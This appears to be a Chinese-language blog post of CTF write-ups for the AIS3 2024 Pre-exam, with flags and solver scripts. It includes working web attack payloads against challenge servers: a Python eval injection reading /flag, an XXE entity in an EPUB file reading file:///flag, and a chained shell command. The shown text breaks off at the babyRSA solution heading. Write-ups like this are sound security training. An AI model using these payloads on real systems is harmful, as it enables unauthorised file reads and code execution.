<!DOCTYPE html>
<html lang="en">
  <head>
  <meta charset="UTF-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <meta name="google-site-verification" content="5tL3vVFDCs7jVMzgjoYnu0u--R7lK5YU0vkMz_MQxdA" />
  <title>Unicorn's Blog | AIS3 2024 Pre-exam</title>
  <link rel="icon" type="image/png" href="/~b12902079/assets/images/profile_picture.jpg">
  
  <link rel="stylesheet" href="/~b12902079/assets/css/post.css" />
  <link rel="stylesheet" href="/~b12902079/assets/css/syntax.css" />
  
  <link rel="stylesheet" href="/~b12902079/assets/css/common.css" />
  <script src="https://cdn.jsdelivr.net/npm/mathjax@2/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type="text/javascript"></script>
  <script src="/~b12902079/assets/js/categories.js"></script>
  <script>
    const currentTheme = localStorage.getItem("theme");
    if (currentTheme) {
      document.documentElement.setAttribute(
        "data-theme",
        localStorage.getItem("theme")
      );
    }
  </script>
  
  <script defer src="/~b12902079/assets/js/collapsible.js"></script>
  <script defer src="/~b12902079/assets/js/lbox.js"></script>
  
</head>

  <body>
    <main>
      <header>
  <a class="site-title" href="/~b12902079/">Unicorn's Blog</a>
  <!-- dark/light mode -->
  <span id="dark-mode-toggle" style="cursor: pointer">
    <svg
      stroke="currentColor"
      fill="currentColor"
      stroke-width="0"
      viewBox="0 0 16 16"
      height="1.2em"
      width="1.2em"
      xmlns="http://www.w3.org/2000/svg"
    >
      <path
        d="M8 1a7 7 0 1 0 0 14A7 7 0 0 0 8 1zm0 13V2a6 6 0 1 1 0 12z"
      ></path>
    </svg>
  </span>
</header>

      <section class="article">
        <div class="article-header">
          <h2 class="article-title">AIS3 2024 Pre-exam</h2>
          <small class="date">10 Aug 2024</small>
          <div class="categories">
            
            <a href="#!" class="category">ais3</a>
            
            <a href="#!" class="category">ctf</a>
            
            <a href="#!" class="category">writeup</a>
            
          </div>
        </div>
        <ul class="content"><li><a href="#welcome">Welcome</a><ul><li><a href="#solve">Solve</a></li><li><a href="#flag">Flag</a></li></ul></li><li><a href="#quantum-nim-heist">Quantum Nim Heist</a><ul><li><a href="#vulnerability">Vulnerability</a></li><li><a href="#solve-1">Solve</a></li><li><a href="#flag-1">Flag</a></li></ul></li><li><a href="#three-dimensional-secret">Three Dimensional Secret</a></li><li><a href="#solve-2">Solve</a><ul><li><a href="#flag-2">Flag</a></li></ul></li><li><a href="#emoji-console">Emoji Console</a><ul><li><a href="#solve-3">Solve</a></li><li><a href="#flag-3">Flag</a></li></ul></li><li><a href="#hash-guesser">Hash Guesser</a><ul><li><a href="#vulnerability-1">Vulnerability</a></li><li><a href="#solve-4">Solve</a></li><li><a href="#flag-4">Flag</a></li></ul></li><li><a href="#evil-calculator">Evil Calculator</a><ul><li><a href="#vulnerability-2">Vulnerability</a></li><li><a href="#solve-5">Solve</a></li><li><a href="#flag-5">Flag</a></li></ul></li><li><a href="#ebook-parser">Ebook Parser</a><ul><li><a href="#vulnerability-3">Vulnerability</a></li><li><a href="#solve-6">Solve</a></li><li><a href="#flag-6">Flag</a></li></ul></li><li><a href="#the-long-print">The Long Print</a><ul><li><a href="#solve-7">Solve</a></li><li><a href="#flag-7">Flag</a></li></ul></li><li><a href="#火拳のエース">火拳のエース</a><ul><li><a href="#solve-8">Solve</a></li><li><a href="#flag-8">Flag</a></li></ul></li><li><a href="#fakers-really-op-meow-way">faker’s Really OP meow way</a><ul><li><a href="#solve-9">Solve</a></li><li><a href="#flag-9">Flag</a></li></ul></li><li><a href="#pixelclicker_revenge">PixelClicker_Revenge</a><ul><li><a href="#solve-10">Solve</a></li><li><a href="#flag-10">Flag</a></li></ul></li><li><a href="#babyrsa">babyRSA</a><ul><li><a href="#vulnerability-4">Vulnerability</a></li><li><a href="#solve-11">Solve</a></li><li><a href="#flag-11">Flag</a></li></ul></li><li><a href="#mathter">Mathter</a><ul><li><a href="#vulnerability-5">Vulnerability</a></li><li><a href="#solve-12">Solve</a></li><li><a href="#flag-12">Flag</a></li></ul></li><li><a href="#base64-encoder">Base64 Encoder</a><ul><li><a href="#solve-13">Solve</a></li><li><a href="#flag-13">Flag</a></li></ul></li></ul>
        <div class="content"><h1 id="welcome">Welcome</h1>

<h2 id="solve">Solve</h2>

<p>打開題目就有 flag</p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/welcome-solve.png" alt="image" /></p>

<h2 id="flag">Flag</h2>

<p><code class="language-plaintext highlighter-rouge">AIS3{Welc0me_to_AIS3_PreExam_2o24!}</code></p>

<h1 id="quantum-nim-heist">Quantum Nim Heist</h1>

<h2 id="vulnerability">Vulnerability</h2>

<p>從 <code class="language-plaintext highlighter-rouge">server.py</code> 的 <code class="language-plaintext highlighter-rouge">play</code> 可以看到 <code class="language-plaintext highlighter-rouge">choice</code> 不等於 0, 1, 2 時會直接換 ai 下</p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/quantum-nim-heist-vulnerability.png" alt="image" /></p>

<h2 id="solve-1">Solve</h2>

<p>先隨意移動一次寫入 <code class="language-plaintext highlighter-rouge">count</code>, <code class="language-plaintext highlighter-rouge">pile</code> 之後 print 才不會 error</p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/quantum-nim-heist-solve-1.png" alt="image" /></p>

<p>接著輸入 <code class="language-plaintext highlighter-rouge">3</code> 直到剩下一堆，拿走全部獲勝並取得 flag</p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/quantum-nim-heist-solve-2.png" alt="image" /></p>

<h2 id="flag-1">Flag</h2>

<p><code class="language-plaintext highlighter-rouge">AIS3{Ar3_y0u_a_N1m_ma57er_0r_a_Crypt0_ma57er?}</code></p>

<h1 id="three-dimensional-secret">Three Dimensional Secret</h1>

<h1 id="solve-2">Solve</h1>

<p>隨意 follow 一個 tcp stream 看到封包在傳送 G-code</p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/three-dimensional-secret-solve-1.png" alt="image" /></p>

<p>使用<a href="https://nraynaud.github.io/webgcode/">線上 G-code 模擬器</a>畫出 flag</p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/three-dimensional-secret-solve-2.png" alt="image" /></p>

<h2 id="flag-2">Flag</h2>

<p><code class="language-plaintext highlighter-rouge">AIS3{b4d1y_tun3d_PriN73r}</code></p>

<h1 id="emoji-console">Emoji Console</h1>

<h2 id="solve-3">Solve</h2>

<p><code class="language-plaintext highlighter-rouge">🐱 ⭐</code> <code class="language-plaintext highlighter-rouge">cat *</code> 印出所有檔案看到 source code 及發現 <code class="language-plaintext highlighter-rouge">./flag</code></p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/emoji-console-solve-1.png" alt="image" /></p>

<p><code class="language-plaintext highlighter-rouge">💿 🚩😜🤬 🐱 ⭐</code>  <code class="language-plaintext highlighter-rouge">cd flag;p#$%&amp;! cat *</code> 進到 <code class="language-plaintext highlighter-rouge">./flag</code> 並印出所有檔案，找到 <code class="language-plaintext highlighter-rouge">flag-printer.py</code></p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/emoji-console-solve-2.png" alt="image" /></p>

<p><code class="language-plaintext highlighter-rouge">💿 🚩😜🤬 🐍 ⭐</code> <code class="language-plaintext highlighter-rouge">cd flag;p#$%&amp;! python *</code> 執行 <code class="language-plaintext highlighter-rouge">flag-printer.py</code> 取得 flag</p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/emoji-console-solve-3.png" alt="image" /></p>

<h2 id="flag-3">Flag</h2>

<p><code class="language-plaintext highlighter-rouge">AIS3{🫵🪡🉐🤙🤙🤙👉👉🚩👈👈}</code></p>

<h1 id="hash-guesser">Hash Guesser</h1>

<h2 id="vulnerability-1">Vulnerability</h2>

<p>從 <code class="language-plaintext highlighter-rouge">app.py</code> 看到使用 <code class="language-plaintext highlighter-rouge">util.is_same_image</code> 比較圖片</p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/hash-guesser-vulnerability-1.png" alt="image" /></p>

<p>trace source code 發現沒有比較大小的部份，猜測會才切成較小的圖片再比較，如此全黑或全白的 1*1 照片有 1/2 機率正確</p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/hash-guesser-vulnerability-2.png" alt="image" /></p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/hash-guesser-vulnerability-3.png" alt="image" /></p>

<h2 id="solve-4">Solve</h2>

<p>生成 1*1 全黑的照片</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">image</span> <span class="o">=</span> <span class="n">Image</span><span class="p">.</span><span class="nf">new</span><span class="p">(</span><span class="sh">"</span><span class="s">L</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">),</span> <span class="mi">0</span><span class="p">)</span>
<span class="n">image</span><span class="p">.</span><span class="nf">putdata</span><span class="p">([</span><span class="mi">0</span><span class="p">])</span>
<span class="n">image</span><span class="p">.</span><span class="nf">save</span><span class="p">(</span><span class="sh">'</span><span class="s">img.png</span><span class="sh">'</span><span class="p">)</span>
</code></pre></div></div>
<p>多嘗試幾次後取得 flag</p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/hash-guesser-solve.png" alt="image" /></p>

<h2 id="flag-4">Flag</h2>

<p><code class="language-plaintext highlighter-rouge">AIS3{https://github.com/python-pillow/Pillow/issues/2982}</code></p>

<h1 id="evil-calculator">Evil Calculator</h1>

<h2 id="vulnerability-2">Vulnerability</h2>

<p>在 <code class="language-plaintext highlighter-rouge">app.py</code> 中看到此計算機是用 <code class="language-plaintext highlighter-rouge">eval()</code> 來計算，所以可以注入 python 程式</p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/evil-calculator-vulnerability.png" alt="image" /></p>

<h2 id="solve-5">Solve</h2>

<p>利用 burpsuite 攔截 request 將 <code class="language-plaintext highlighter-rouge">expression</code> 改成 <code class="language-plaintext highlighter-rouge">open('/flag').read()</code> 就成功取得 flag</p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/evil-calculator-solve.png" alt="image" /></p>

<h2 id="flag-5">Flag</h2>

<p><code class="language-plaintext highlighter-rouge">AIS3{7RiANG13_5NAK3_I5_50_3Vi1}</code></p>

<h1 id="ebook-parser">Ebook Parser</h1>

<p>reference: <a href="https://s1gnalcha0s.github.io/epub/2017/01/25/This-book-reads-you.html">This book reads you - exploiting services and readers that support the ePub book format</a></p>

<h2 id="vulnerability-3">Vulnerability</h2>

<p>ebook metadata 是以 xml 形式紀錄所以嘗試使用 XXE 攻擊</p>

<h2 id="solve-6">Solve</h2>

<p>先用 python 新增簡單的 ebook file</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="n">ebooklib</span> <span class="kn">import</span> <span class="n">epub</span>

<span class="n">book</span> <span class="o">=</span> <span class="n">epub</span><span class="p">.</span><span class="nc">EpubBook</span><span class="p">()</span>

<span class="n">book</span><span class="p">.</span><span class="nf">set_title</span><span class="p">(</span><span class="sh">"</span><span class="s">test</span><span class="sh">"</span><span class="p">)</span>
<span class="n">book</span><span class="p">.</span><span class="nf">set_language</span><span class="p">(</span><span class="sh">"</span><span class="s">en</span><span class="sh">"</span><span class="p">)</span>
<span class="n">book</span><span class="p">.</span><span class="nf">add_author</span><span class="p">(</span><span class="sh">"</span><span class="s">unicorn</span><span class="sh">"</span><span class="p">)</span>

<span class="n">epub</span><span class="p">.</span><span class="nf">write_epub</span><span class="p">(</span><span class="sh">"</span><span class="s">test.epub</span><span class="sh">"</span><span class="p">,</span> <span class="n">book</span><span class="p">,</span> <span class="p">{})</span>
</code></pre></div></div>

<p>解壓縮 <code class="language-plaintext highlighter-rouge">test.epub</code>，編輯 <code class="language-plaintext highlighter-rouge">EPUB/content.opf</code> 注入 XXE payload 後再重新壓縮回 <code class="language-plaintext highlighter-rouge">test.epub</code></p>

<div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;!DOCTYPE data [&lt;!ENTITY flag SYSTEM "file:///flag"&gt;</span>]&gt;
...
    <span class="nt">&lt;dc:title&gt;</span><span class="ni">&amp;flag;</span><span class="nt">&lt;/dc:title&gt;</span>
</code></pre></div></div>
<p>上傳後成功取得 flag</p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/ebook-parser-solve.png" alt="image" /></p>

<h2 id="flag-6">Flag</h2>

<p><code class="language-plaintext highlighter-rouge">AIS3{LP#1742885: lxml no longer expands external entities (XXE) by default}</code></p>

<h1 id="the-long-print">The Long Print</h1>

<h2 id="solve-7">Solve</h2>

<p>利用 ida 把 <code class="language-plaintext highlighter-rouge">sleep</code> 時間 patch 成 1 秒</p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/the-long-print-solve-1.png" alt="image" /></p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/the-long-print-solve-2.png" alt="image" /></p>

<p>執行程式並在 flag 消失前記下</p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/the-long-print-solve-3.png" alt="image" /></p>

<h2 id="flag-7">Flag</h2>

<p><code class="language-plaintext highlighter-rouge">AIS3{You_are_the_master_of_time_management!!!!?}</code></p>

<h1 id="火拳のエース">火拳のエース</h1>

<h2 id="solve-8">Solve</h2>

<p>先利用 ida 把 <code class="language-plaintext highlighter-rouge">usleep</code> 時間 patch 成 1 秒</p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/火拳のエース-solve-1.png" alt="image" /></p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/火拳のエース-solve-2.png" alt="image" /></p>

<p>看出程式會將剩下的 flag 分為四個長度 8 的 stirng，並分別 <code class="language-plaintext highlighter-rouge">xor_strings</code>、<code class="language-plaintext highlighter-rouge">complex_function</code> 每個字元後必須與 <code class="language-plaintext highlighter-rouge">"DHLIYJEG", "MZRERYND", "RUYODBAH", "BKEMPBRE"</code> 相同</p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/火拳のエース-solve-3.png" alt="image" /></p>

<p>在 gdb 設定 break point 於 <code class="language-plaintext highlighter-rouge">xor_strings</code> 找出 flag 會 xor 的 string，分別為：</p>

<p>first: <code class="language-plaintext highlighter-rouge">0xe     0xd     0x7d    0x6     0xf     0x17    0x76    0x4</code>
second: <code class="language-plaintext highlighter-rouge">0x6d    0x0     0x1b    0x7c    0x6c    0x13    0x62    0x11</code>
third: <code class="language-plaintext highlighter-rouge">0x1e    0x7e    0x6     0x13    0x7     0x66    0xe     0x71</code>
forth: <code class="language-plaintext highlighter-rouge">0x17    0x14    0x1d    0x70    0x79    0x67    0x74    0x33</code></p>

<p>最後依照 ida 的 pseudo code 用 python 寫出，並 brute force 出 xor 後的字元，再與前面找出的 xor string 進行 xor 就得到 flag</p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/火拳のエース-solve-4.png" alt="image" /></p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">complex_function</span><span class="p">(</span><span class="n">a1</span><span class="p">,</span> <span class="n">a2</span><span class="p">):</span>
    <span class="n">v8</span> <span class="o">=</span> <span class="p">(</span><span class="mi">17</span> <span class="o">*</span> <span class="n">a2</span> <span class="o">+</span> <span class="n">a1</span> <span class="o">-</span> <span class="mi">65</span><span class="p">)</span> <span class="o">%</span> <span class="mi">26</span>
    <span class="n">v7</span> <span class="o">=</span> <span class="n">a2</span> <span class="o">%</span> <span class="mi">3</span> <span class="o">+</span> <span class="mi">3</span>
    <span class="k">if</span> <span class="n">a2</span> <span class="o">%</span> <span class="mi">3</span> <span class="o">==</span> <span class="mi">2</span><span class="p">:</span>
        <span class="n">v8</span> <span class="o">=</span> <span class="p">(</span><span class="n">v8</span> <span class="o">-</span> <span class="n">v7</span> <span class="o">+</span> <span class="mi">26</span><span class="p">)</span> <span class="o">%</span> <span class="mi">26</span>
    <span class="k">elif</span> <span class="n">a2</span> <span class="o">%</span> <span class="mi">3</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
        <span class="n">v8</span> <span class="o">=</span> <span class="p">(</span><span class="mi">2</span> <span class="o">*</span> <span class="n">v7</span> <span class="o">+</span> <span class="n">v8</span><span class="p">)</span> <span class="o">%</span> <span class="mi">26</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="n">v8</span> <span class="o">=</span> <span class="p">(</span><span class="n">v7</span> <span class="o">*</span> <span class="n">v8</span> <span class="o">+</span> <span class="mi">7</span><span class="p">)</span> <span class="o">%</span> <span class="mi">26</span>
    <span class="k">return</span> <span class="nf">chr</span><span class="p">(</span><span class="n">v8</span> <span class="o">+</span> <span class="mi">65</span><span class="p">)</span>

<span class="n">s</span> <span class="o">=</span> <span class="p">[</span><span class="sh">"</span><span class="s">DHLIYJEG</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">MZRERYND</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">RUYODBAH</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">BKEMPBRE</span><span class="sh">"</span><span class="p">]</span>
<span class="n">xored</span> <span class="o">=</span> <span class="p">[</span><span class="sh">""</span><span class="p">,</span> <span class="sh">""</span><span class="p">,</span> <span class="sh">""</span><span class="p">,</span> <span class="sh">""</span><span class="p">]</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="mi">8</span><span class="p">):</span>
    <span class="k">for</span> <span class="n">j</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="mi">4</span><span class="p">):</span>
        <span class="k">for</span> <span class="n">k</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="mi">26</span><span class="p">):</span>
            <span class="k">if</span> <span class="n">s</span><span class="p">[</span><span class="n">j</span><span class="p">][</span><span class="n">i</span><span class="p">]</span> <span class="o">==</span> <span class="nf">complex_function</span><span class="p">(</span><span class="n">k</span> <span class="o">+</span> <span class="nf">ord</span><span class="p">(</span><span class="sh">'</span><span class="s">A</span><span class="sh">'</span><span class="p">),</span> <span class="n">i</span> <span class="o">+</span> <span class="mi">32</span> <span class="o">*</span> <span class="n">j</span><span class="p">):</span>
                <span class="n">xored</span><span class="p">[</span><span class="n">j</span><span class="p">]</span> <span class="o">+=</span> <span class="nf">chr</span><span class="p">(</span><span class="n">k</span> <span class="o">+</span> <span class="nf">ord</span><span class="p">(</span><span class="sh">'</span><span class="s">A</span><span class="sh">'</span><span class="p">))</span>

<span class="nf">print</span><span class="p">(</span><span class="n">xored</span><span class="p">)</span>

<span class="n">xor</span> <span class="o">=</span> <span class="p">[[</span><span class="mh">0xe</span><span class="p">,</span> <span class="mh">0xd</span><span class="p">,</span> <span class="mh">0x7d</span><span class="p">,</span> <span class="mh">0x6</span><span class="p">,</span> <span class="mh">0xf</span><span class="p">,</span> <span class="mh">0x17</span><span class="p">,</span> <span class="mh">0x76</span><span class="p">,</span> <span class="mh">0x4</span><span class="p">],</span>
       <span class="p">[</span><span class="mh">0x6d</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x1b</span><span class="p">,</span> <span class="mh">0x7c</span><span class="p">,</span> <span class="mh">0x6c</span><span class="p">,</span> <span class="mh">0x13</span><span class="p">,</span> <span class="mh">0x62</span><span class="p">,</span> <span class="mh">0x11</span><span class="p">],</span>
       <span class="p">[</span><span class="mh">0x1e</span><span class="p">,</span> <span class="mh">0x7e</span><span class="p">,</span> <span class="mh">0x6</span><span class="p">,</span> <span class="mh">0x13</span><span class="p">,</span> <span class="mh">0x7</span><span class="p">,</span> <span class="mh">0x66</span><span class="p">,</span> <span class="mh">0xe</span><span class="p">,</span> <span class="mh">0x71</span><span class="p">],</span>
       <span class="p">[</span><span class="mh">0x17</span><span class="p">,</span> <span class="mh">0x14</span><span class="p">,</span> <span class="mh">0x1d</span><span class="p">,</span> <span class="mh">0x70</span><span class="p">,</span> <span class="mh">0x79</span><span class="p">,</span> <span class="mh">0x67</span> <span class="p">,</span><span class="mh">0x74</span> <span class="p">,</span><span class="mh">0x33</span><span class="p">]]</span>

<span class="n">flag</span> <span class="o">=</span> <span class="p">[</span><span class="sh">""</span><span class="p">,</span> <span class="sh">""</span><span class="p">,</span> <span class="sh">""</span><span class="p">,</span> <span class="sh">""</span><span class="p">]</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="mi">4</span><span class="p">):</span>
    <span class="k">for</span> <span class="n">j</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="mi">8</span><span class="p">):</span>
        <span class="n">flag</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">+=</span> <span class="nf">chr</span><span class="p">(</span><span class="nf">ord</span><span class="p">(</span><span class="n">xored</span><span class="p">[</span><span class="n">i</span><span class="p">][</span><span class="n">j</span><span class="p">])</span> <span class="o">^</span> <span class="n">xor</span><span class="p">[</span><span class="n">i</span><span class="p">][</span><span class="n">j</span><span class="p">])</span>

<span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">AIS3{G0D</span><span class="sh">"</span> <span class="o">+</span> <span class="sh">""</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="n">flag</span><span class="p">))</span>
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>['QIIKAHBJ', 'TRDMYLWD', 'NMTLWVYB', 'ERHAXFUN']
AIS3{G0D_D4MN_4N9R_15_5UP3R_P0W3RFU1!!!}
</code></pre></div></div>

<h2 id="flag-8">Flag</h2>

<p><code class="language-plaintext highlighter-rouge">AIS3{G0D_D4MN_4N9R_15_5UP3R_P0W3RFU1!!!}</code></p>

<h1 id="fakers-really-op-meow-way">faker’s Really OP meow way</h1>

<h2 id="solve-9">Solve</h2>

<p>使用 ida 把生成亂數的檔案從 <code class="language-plaintext highlighter-rouge">/dev/urandom</code> 改成自行生成全為 <code class="language-plaintext highlighter-rouge">\x00</code> 的 <code class="language-plaintext highlighter-rouge">randomnumber</code></p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/fakers-really-OP-meow-way-solve-1.png" alt="image" /></p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/fakers-really-OP-meow-way-solve-2.png" alt="image" /></p>

<p>先將 <code class="language-plaintext highlighter-rouge">flag.txt</code> 寫為 <code class="language-plaintext highlighter-rouge">AIS3{aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa}</code> 作為 placeholder</p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/fakers-really-OP-meow-way-solve-3.png" alt="image" /></p>

<p>在 <code class="language-plaintext highlighter-rouge">memcmp</code> 設定 break point 以 dump 記憶體，觀察發現正確的字元會顯示 <code class="language-plaintext highlighter-rouge">0x00</code>，接著使用 python 輔助將還沒解出的字元全部改為某個測試字元，藉此手動比較 <code class="language-plaintext highlighter-rouge">memcpy</code> 的記憶體來 brute force 直到所有結果皆為 <code class="language-plaintext highlighter-rouge">0x00</code> 為止</p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/fakers-really-OP-meow-way-solve-4.png" alt="image" /></p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">flag</span> <span class="o">=</span> <span class="sh">"</span><span class="s">AIS3{******************************************}</span><span class="sh">"</span>
<span class="n">test_char</span> <span class="o">=</span> <span class="sh">'</span><span class="s">3</span><span class="sh">'</span>

<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="mi">48</span><span class="p">):</span>
    <span class="k">if</span> <span class="n">flag</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">==</span> <span class="sh">'</span><span class="s">*</span><span class="sh">'</span><span class="p">:</span>
        <span class="n">flag</span> <span class="o">=</span> <span class="n">flag</span><span class="p">[:</span><span class="n">i</span><span class="p">]</span> <span class="o">+</span> <span class="n">test_char</span> <span class="o">+</span> <span class="n">flag</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">:]</span>

<span class="nf">print</span><span class="p">(</span><span class="n">flag</span><span class="p">)</span>
</code></pre></div></div>

<h2 id="flag-9">Flag</h2>

<p><code class="language-plaintext highlighter-rouge">AIS3{r3v3r51n6_r0p_15_c00l_r16h7???}</code></p>

<h1 id="pixelclicker_revenge">PixelClicker_Revenge</h1>

<h2 id="solve-10">Solve</h2>

<p>在 x64dbg 找到會跳到 <code class="language-plaintext highlighter-rouge">FAIL\n</code> 的兩個判斷位置，設定 break point 後，根據提示多次嘗試發現為點擊位置的 x, y 座標</p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/pixelclicker-revenge-solve-1.png" alt="image" /></p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/pixelclicker-revenge-solve-2.png" alt="image" /></p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/pixelclicker-revenge-solve-3.png" alt="image" /></p>

<p>接著將會比較範圍的 memory dump 出來，結束的值從 ida 可以簡單看出</p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/pixelclicker-revenge-solve-4.png" alt="image" /></p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/pixelclicker-revenge-solve-5.png" alt="image" /></p>

<p>接著用 python 畫出所有的點就得到 flag</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="n">numpy</span> <span class="k">as</span> <span class="n">np</span>
<span class="kn">from</span> <span class="n">PIL</span> <span class="kn">import</span> <span class="n">Image</span><span class="p">,</span> <span class="n">ImageDraw</span>

<span class="k">with</span> <span class="nf">open</span><span class="p">(</span><span class="sh">'</span><span class="s">./MEM_000000756D179890_00003F90.mem</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">rb</span><span class="sh">'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
    <span class="n">data</span> <span class="o">=</span> <span class="n">f</span><span class="p">.</span><span class="nf">read</span><span class="p">()</span>

<span class="n">img</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="nf">zeros</span><span class="p">((</span><span class="mi">400</span><span class="p">,</span> <span class="mi">400</span><span class="p">))</span>
<span class="n">flag</span> <span class="o">=</span> <span class="n">Image</span><span class="p">.</span><span class="nf">fromarray</span><span class="p">(</span><span class="n">img</span><span class="p">,</span> <span class="n">mode</span> <span class="o">=</span> <span class="sh">'</span><span class="s">L</span><span class="sh">'</span><span class="p">)</span>
<span class="n">draw</span> <span class="o">=</span> <span class="n">ImageDraw</span><span class="p">.</span><span class="nc">Draw</span><span class="p">(</span><span class="n">flag</span><span class="p">)</span>
<span class="n">path</span> <span class="o">=</span> <span class="p">[]</span>

<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nf">len</span><span class="p">(</span><span class="n">data</span><span class="p">),</span> <span class="mi">8</span><span class="p">):</span>
    <span class="n">x</span> <span class="o">=</span> <span class="nb">int</span><span class="p">.</span><span class="nf">from_bytes</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="n">i</span> <span class="p">:</span> <span class="n">i</span> <span class="o">+</span> <span class="mi">4</span><span class="p">],</span> <span class="sh">'</span><span class="s">little</span><span class="sh">'</span><span class="p">)</span>
    <span class="n">y</span> <span class="o">=</span> <span class="nb">int</span><span class="p">.</span><span class="nf">from_bytes</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="n">i</span> <span class="o">+</span> <span class="mi">4</span><span class="p">:</span> <span class="n">i</span> <span class="o">+</span> <span class="mi">8</span><span class="p">],</span> <span class="sh">'</span><span class="s">little</span><span class="sh">'</span><span class="p">)</span>
    <span class="n">path</span><span class="p">.</span><span class="nf">append</span><span class="p">((</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">))</span>

<span class="n">draw</span><span class="p">.</span><span class="nf">point</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">fill</span> <span class="o">=</span> <span class="mi">255</span><span class="p">)</span>

<span class="n">flag</span><span class="p">.</span><span class="nf">save</span><span class="p">(</span><span class="sh">"</span><span class="s">flag.jpg</span><span class="sh">"</span><span class="p">)</span>
</code></pre></div></div>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/pixelclicker-revenge-solve-6.jpg" alt="image" /></p>

<h2 id="flag-10">Flag</h2>

<p><code class="language-plaintext highlighter-rouge">AIS3{nOw_Ur_A_p4int3r_M4steR}</code></p>

<h1 id="babyrsa">babyRSA</h1>

<h2 id="vulnerability-4">Vulnerability</h2>

<p><code class="language-plaintext highlighter-rouge">encrypt</code> 可以看到每次都只會加密一個字元，因此將所有字元都用相同 key encrypt 建表後，對照就能得到 flag</p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/babyrsa-vulnerability.png" alt="image" /></p>

<h2 id="solve-11">Solve</h2>

